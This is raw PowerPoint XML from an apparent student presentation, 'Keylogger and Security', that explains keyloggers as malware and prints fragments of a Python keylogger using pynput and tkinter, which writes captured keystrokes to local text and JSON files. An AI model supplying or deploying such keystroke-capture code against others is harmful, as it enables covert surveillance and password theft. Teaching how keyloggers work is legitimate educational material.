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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="270"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F38C88-2338-437A-A0A7-B222A1521D03}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Default Section" id="{060D5A08-38FC-4BF0-976E-7955D49ED71D}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{9B03104C-3765-4B6F-AE66-86FEB12F7695}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="264"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{8829FB4C-303B-4282-BB9E-17652C744D8C}">
          <p14:sldIdLst>
            <p14:sldId id="270"/>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CAF33-DFCD-4673-9958-D3430BF34630}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>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BB4AE0-30D6-44FE-B1F7-0AE127A64847}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276941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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25360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6/13/2024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6/13/2024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08926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 id="2147483750" r:id="rId12"/>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09800" y="2067305"/>
            <a:ext cx="77724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t>PYLA JAGADEESH</a:t>
            </a:r>
            <a:endParaRPr spc="15" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484620" y="2821622"/>
            <a:ext cx="20497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D83A-16FC-0DC4-8AE2-AB8B86C0FD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="10681335" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55F5ED2-416E-6A73-374B-95553742245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3657600"/>
            <a:ext cx="2392887" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272241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1491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937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40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1EE112B5-808D-8A68-D162-6AD0F842AAC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553315" y="2758767"/>
            <a:ext cx="6334126" cy="2462213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard.</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7" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FC879F-54C5-DF41-9278-7F4E757B4D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501097" y="2496129"/>
            <a:ext cx="6100916" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keylogger lets the company record and process your keystrokes, so it can track anything you type on your keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>By these wireframes we can protect our company and it is useful to find information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>To create a wireframes we can have software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1"/>
              <a:t>to create it.</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2" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E4CC72-D216-4C0D-A3B1-B04338A93FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2439687"/>
            <a:ext cx="6396191" cy="2677656"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D4CAE7-92FB-49A0-191E-7B71A5C2B67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889193" y="3039171"/>
            <a:ext cx="8864407" cy="2780604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="60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28E9A193-B518-D959-B701-5A73BB4CB011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="1524253"/>
            <a:ext cx="7774078" cy="3970318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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A keylogger is a key stroker/keyboard capturing is a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> or hardware that keeps track of and records your keystrokes as you type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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It takes the information and sends it to a hacker using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>command-and-control (C&amp;C) server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>The hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC2E613-13CF-B390-7C8E-646CA04B0F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786785" y="1905000"/>
            <a:ext cx="6940869" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="200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F8B9517B-408D-5892-CAB8-F64538390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10400" y="9969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CB9494F-CB3D-99CF-97DE-18384C4FF339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717960" y="1589285"/>
            <a:ext cx="8858250" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="2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15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D2CF31-2675-5BCC-34D8-DA2BDC8D833D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3215622"/>
            <a:ext cx="1699407" cy="213378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2520CC89-2BCC-CDBE-D513-8EDC5D7FB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4242699" y="3249914"/>
            <a:ext cx="2088061" cy="1447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10400" y="13534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2083" y="793340"/>
            <a:ext cx="10681335"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9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04424235-4229-535E-03E7-C5138D572D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546669" y="2240668"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="2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443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0437" y="11835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5670CA18-5EB9-40D3-8216-A7599386802B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="5486400" cy="4001095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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F68C-8AB2-5381-F366-AF79105535D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="5232202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
